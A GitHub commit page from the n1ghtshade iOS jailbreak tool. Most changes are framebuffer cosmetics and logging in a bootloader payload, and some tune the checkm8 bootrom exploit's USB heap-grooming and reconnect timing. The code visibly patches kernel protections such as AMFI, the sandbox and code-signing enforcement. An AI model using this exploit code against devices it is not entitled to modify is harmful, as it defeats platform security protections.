Fancy framebuffer, way better checkm8

synackuk · Dec 23, 2019 · b883427 · b883427
1 parent 9cf4603
commit b883427
Show file tree

Hide file tree

Showing 16 changed files with 55,957 additions and 86 deletions.
diff --git a/README.md b/README.md
@@ -48,6 +48,7 @@
 
 * Thanks to [axi0mX](https://github.com/axi0mX) for [checkm8](https://github.com/axi0mX/ipwndfu)
 * Thanks to [Daniel Volt](https://github.com/DanielVolt) for A6X offsets
+* Thanks to [Dora2](https://github.com/dora2-iOS/) for some improvements to checkm8 reliability
 * Thanks to [Chronic Dev](https://github.com/Chronic-Dev) for [greenpois0n](https://github.com/Chronic-Dev/gprc5)
 * Thanks to [xerub](https://github.com/xerub) for [ibex](https://github.com/xerub/ibex)
 * Thanks to [iH8Sn0w](https://github.com/ih8sn0w), [tihmstar](https://github.com/tihmstar), [nyan_satan](https://github.com/nyan_satan) for [iBoot32Patcher](https://github.com/NyanSatan/iBoot32Patcher)

diff --git a/atropine/entry.S b/atropine/entry.S
@@ -24,7 +24,8 @@ reset:
 	mov	r5, pc @ Otherwise find the load address
 	lsr	r5, #24
 	lsl r5, #24
-	add r1, r5, #LOADADDRESS_OFFSET @ And add a specified offset so that the payload survives other files being uploaded to the buffer
+	ldr r6, =LOADADDRESS_OFFSET
+	add r1, r5, r6 @ And add a specified offset so that the payload survives other files being uploaded to the buffer
 	mov r0, r5
 	b relocate @ relocate(loadaddr, loadaddr + LOADADDRESS_OFFSET)
 

diff --git a/atropine/framebuffer.c b/atropine/framebuffer.c
@@ -5,7 +5,18 @@ int fb_x = 0;
 int fb_y = 0;
 
 int init_framebuffer() {
-	fb_print("Pwned by synackuk ;)\n");
+	for(int i = 0; i < (display_width / font_width); i++) {
+		fb_print("=");
+	}
+	fb_print("\n");
+	fb_print("n1ghtshade.\n");
+	fb_print("By synackuk ;)\n");
+	fb_print("\n");
+	for(int i = 0; i < (display_width / font_width); i++) {
+		fb_print("=");
+	}
+	fb_print("\n");
+
 	debug("initialised framebuffer.\n");
 	return 0;
 }
@@ -20,14 +31,14 @@ int font_get_pixel(int ch, int x, int y) {
 	return (font_data[bitIndex / 8] >> (bitIndex % 8)) & 0x1;
 }
 
-volatile unsigned int* fb_get_pixel(register unsigned int x, register unsigned int y) {
-	return (((unsigned int*)framebuffer_address) + (y * display_width) + x);
+volatile uint32_t* fb_get_pixel(register uint32_t x, register uint32_t y) {
+	return (((uint32_t*)framebuffer_address) + (y * display_width) + x);
 }
 
 static void fb_scrollup() {
-	register volatile unsigned int* newFirstLine = fb_get_pixel(0, font_height);
-	register volatile unsigned int* oldFirstLine = fb_get_pixel(0, 0);
-	register volatile unsigned int* end = oldFirstLine + (display_width * display_height);
+	register volatile uint32_t* newFirstLine = fb_get_pixel(0, font_height);
+	register volatile uint32_t* oldFirstLine = fb_get_pixel(0, 0);
+	register volatile uint32_t* end = oldFirstLine + (display_width * display_height);
 	while(newFirstLine < end) {
 		*(oldFirstLine++) = *(newFirstLine++);
 	}
@@ -49,8 +60,8 @@ void fb_putc(int c) {
 		fb_y++;
 
 	} else {
-		register unsigned int sx;
-		register unsigned int sy;
+		register uint32_t sx;
+		register uint32_t sy;
 
 		for(sy = 0; sy < font_height; sy++) {
 			for(sx = 0; sx < font_width; sx++) {
@@ -76,11 +87,21 @@ void fb_putc(int c) {
 }
 
 void fb_print(const char* str) {
-	unsigned int len = strlen(str);
+	uint32_t len = strlen(str);
 	int i;
 	for(i = 0; i < len; i++) {
 		fb_putc(str[i]);
 	}
 }
 
+void fb_draw_image(uint32_t* image, uint32_t x, uint32_t y, uint32_t width, uint32_t height) {
+	register uint32_t sx;
+	register uint32_t sy;
+	for(sy = 0; sy < height; sy++) {
+		for(sx = 0; sx < width; sx++) {
+			*(fb_get_pixel(sx + x, sy + y)) = RGBA2RGB(image[(sy * width) + sx]);
+		}
+	}
+}
+
 
diff --git a/atropine/includes/framebuffer.h b/atropine/includes/framebuffer.h
@@ -6,11 +6,16 @@
 #define COLOUR_WHITE RGB(0xFF, 0xFF, 0xFF)
 #define COLOUR_BLACK RGB(0, 0, 0)
 
+#define RGBA2RGB(x) ((((x)) & 0xFF) | ((((x) >> 8) & 0xFF) << 8) | ((((x) >> 16) & 0xFF) << 16))
+
+
 int init_framebuffer();
 void fb_set_loc(int x, int y);
 #ifdef DISPLAY_OUTPUT
 void fb_print(const char* str);
+void fb_draw_image(uint32_t* image, uint32_t x, uint32_t y, uint32_t width, uint32_t height);
 #else
 #define fb_print(str) 
+#define fb_draw_image(image, x, y, width, height)
 #endif
 #endif
diff --git a/atropine/kernel.c b/atropine/kernel.c
@@ -741,36 +741,46 @@ int patch_i_can_has_debugger(char* address) {
 int patch_kernel(char* address) {
 	int ret;
 
-	log("Patching proc_enforce\n");
+	log("Patching proc_enforce... ");
 	ret = patch_proc_enforce(address);
 	if(ret != 0) {
+		log("failed\n");
 		return -1;
 	}
+	log("done\n");
 
-	log("Patching mount\n");
+	log("Patching mount... ");
 	ret = patch_mount(address);
 	if(ret != 0) {
+		log("failed\n");
 		return -1;
 	}
+	log("done\n");
 
-	log("Patching amfi\n");
+	log("Patching amfi... ");
 	ret = patch_amfi(address);
 	if(ret != 0) {
+		log("failed\n");
 		return -1;
 	}
+	log("done\n");
 
-	log("Patching sandbox\n");
+	log("Patching sandbox... ");
 	ret = patch_sandbox(address);
 	if(ret != 0) {
+		log("failed\n");
 		return -1;
 	}
+	log("done\n");
 
-	log("Patching i_can_has_debugger\n");
+	log("Patching i_can_has_debugger... ");
 	ret = patch_i_can_has_debugger(address);
 	if(ret != 0) {
+		log("failed\n");
 		return -1;
 	}
-
+	log("done\n");
+
 	return 0;
 }
 

diff --git a/atropine/main.c b/atropine/main.c
@@ -47,7 +47,6 @@ int main(int argc, command_args* argv) {
 			error("Failed to initialise atropine.");
 			return -1;
 		}
-		log("initialised atropine.\n");
 		init = 1;
 		return 0;
 	}

diff --git a/atropine/menu_commands.c b/atropine/menu_commands.c
@@ -26,6 +26,11 @@ int jump_command(int argc, command_args* argv) {
 	return 0;
 }
 
+int logo_command(int argc, command_args* argv) {
+	fb_draw_image((uint32_t*)load_address, ((display_width - 320) / 2), ((display_height - 480) / 2), 320, 480);
+	return 0;
+}
+
 int patch_command(int argc, command_args* argv) {
 	if(!strcmp(argv[1].string, "ibot")){
 		char boot_args[255];
@@ -48,28 +53,31 @@ int load_command(int argc, command_args* argv) {
 		return -1;
 	}
 	if(!strcmp(argv[1].string, "krnl")){
-		log("Loading kernel\n");
+		log("Loading kernel... ");
 		/* load kernel, iH8sn0w style */
 		fs_mount("nand0a", "hfs", "/boot");
 		if ((size = 0x1000000, fs_load_file("/boot/System/Library/Caches/com.apple.kernelcaches/kernelcache", addr, &size)) &&
 			(size = 0x1000000, fs_load_file("/boot/System/Library/Caches/com.apple.kernelcaches/kernelcache.s5l8920x", addr, &size)) &&
 			(size = 0x1000000, fs_load_file("/boot/System/Library/Caches/com.apple.kernelcaches/kernelcache.s5l8922x", addr, &size)) &&
 			(size = 0x1000000, fs_load_file("/boot/System/Library/Caches/com.apple.kernelcaches/kernelcache.s5l8720x", addr, &size))) {
-			error("Failed to read kernel\n");
+			error("failed\n");
 			return -1;
 		}
+		log("done\n");
 	}
 	else if(!strcmp(argv[1].string, "dtre")) {
-		log("Loading device tree\n");
+		log("Loading device tree... ");
 		load_image_from_bdev(addr, DEVICE_TREE_TAG, (size_t*)&size);
+		log("done\n");
 	}
 	else if(!strcmp(argv[1].string, "logo")) {
 		load_image_from_bdev(addr, LOGO_TAG, (size_t*)&size);
 		fb_set_loc(0, 0);
 	}
 	else if(!strcmp(argv[1].string, "ibot")) {
-		log("Loading iBoot\n");
+		log("Loading iBoot... ");
 		load_image_from_bdev(addr, IBOOT_TAG, (size_t*)&size);
+		log("done\n");
 	}
 	set_env_uint("filesize", size, 0);
 	return 0;
@@ -135,6 +143,7 @@ int init_menu_commands() {
 	add_command("load", &load_command, "Loads on device images to the load addresss");
 	add_command("boot-args", &boot_args_command, "Sets boot arguments for loader");
 	add_command("decrypt", &decrypt_command, "Decrypts image at load address");
+	add_command("logo", &logo_command, "Sets logo from load address");
 
 	debug("Initialised menu commands.\n");
 	return 0;

diff --git a/atropine/targets/iBEC/Makefile b/atropine/targets/iBEC/Makefile
@@ -8,7 +8,7 @@ BUILD_DIR = bin
 CFLAGS =  -nostdlib -Wno-multichar -Wno-packed-bitfield-compat -Os -mlittle-endian -std=gnu99 -fpie -I$(BASE_DIR)/includes -I$(BASE_DIR)/plib -I$(BASE_DIR)/iBoot32Patcher -I.
 LDFLAGS = -L$(BASE_DIR)plib -L$(BASE_DIR)iBoot32Patcher -nostdlib -Tscript.ld
 LDLIBS = -liBoot32Patcher -lp -lgcc
-OBJECTS = memory.o finders.o kernel.o relocate.o image.o command.o menu_commands.o framebuffer.o constants.o main.o
+OBJECTS = framebuffer.o constants.o main.o memory.o finders.o relocate.o image.o command.o menu_commands.o kernel.o
 OBJS = $(patsubst %,$(BUILD_DIR)/%,$(OBJECTS))
 OBJCOPY = $(CROSS)objcopy
 

diff --git a/atropine/targets/iBEC/target.h b/atropine/targets/iBEC/target.h
@@ -5,7 +5,7 @@
 
 // The offset from the loadaddress we copy atropine to after the first run
 
-#define LOADADDRESS_OFFSET 0x2000000
+#define LOADADDRESS_OFFSET 0x14100000
 
 // The loader magic
 

diff --git a/belladonna/exploits/checkm8/checkm8.c b/belladonna/exploits/checkm8/checkm8.c
@@ -47,7 +47,7 @@ static int usb_req_stall(libloader_device_t dev){
 static int usb_req_leak(libloader_device_t dev){
 	int ret;
 	unsigned char buf[0x40];
-	ret = libloader_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, buf, 0x40, 1);
+	ret = libloader_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, buf, 0x40, 3);
 	if(ret != LIBUSB_ERROR_TIMEOUT) {
 		return -1;
 	}
@@ -57,7 +57,7 @@ static int usb_req_leak(libloader_device_t dev){
 static int usb_req_no_leak(libloader_device_t dev){
 	int ret;
 	unsigned char buf[0x41];
-	ret = libloader_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, buf, 0x41, 1);
+	ret = libloader_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, buf, 0x41, 3);
 	if(ret != LIBUSB_ERROR_TIMEOUT) {
 		return -1;
 	}
@@ -134,34 +134,19 @@ libloader_device_t checkm8_exploit(libloader_device_t dev) {
 		libloader_close(dev);
 		return NULL;
 	}
-	dev = libloader_reconnect(dev, 0.5);
+	dev = libloader_reconnect(dev, 0);
 	if(!dev) {
 		error("Failed to reconnect to device.");
 		return NULL;
 	}
 
 	LOG("Grooming heap\n");
 	if(large_leak) {
-		ret = usb_req_stall(dev);
-		if(ret != 0) {
-			error("Failed to stall pipe.");
-			libloader_close(dev);
-			return NULL;
-		}
+		usb_req_stall(dev);
 		for(int i = 0; i < large_leak; i++) {
-			ret = usb_req_leak(dev);
-			if(ret != 0) {
-				error("Failed on leak: %d.", i);
-				libloader_close(dev);
-				return NULL;
-			}
+			usb_req_leak(dev);
 		}
 		ret = usb_req_no_leak(dev);
-			if(ret != 0) {
-				error("Failed on unstall pipe.");
-				libloader_close(dev);
-				return NULL;
-			}
 	}
 	else {
 		usb_stall(dev);
@@ -172,7 +157,7 @@ libloader_device_t checkm8_exploit(libloader_device_t dev) {
 		usb_no_leak(dev);
 	}
 	libloader_reset(dev);
-	dev = libloader_reconnect(dev, 0.5);
+	dev = libloader_reconnect(dev, 0);
 	if(!dev) {
 		error("Failed to reconnect to device.");
 		return NULL;
@@ -211,7 +196,7 @@ libloader_device_t checkm8_exploit(libloader_device_t dev) {
 
 	LOG("Executing payload\n");
 	libloader_reset(dev);
-	dev = libloader_reconnect(dev, 2);
+	dev = libloader_reconnect(dev, 0);
 	if(!dev) {
 		error("Failed execute payload.");
 		return NULL;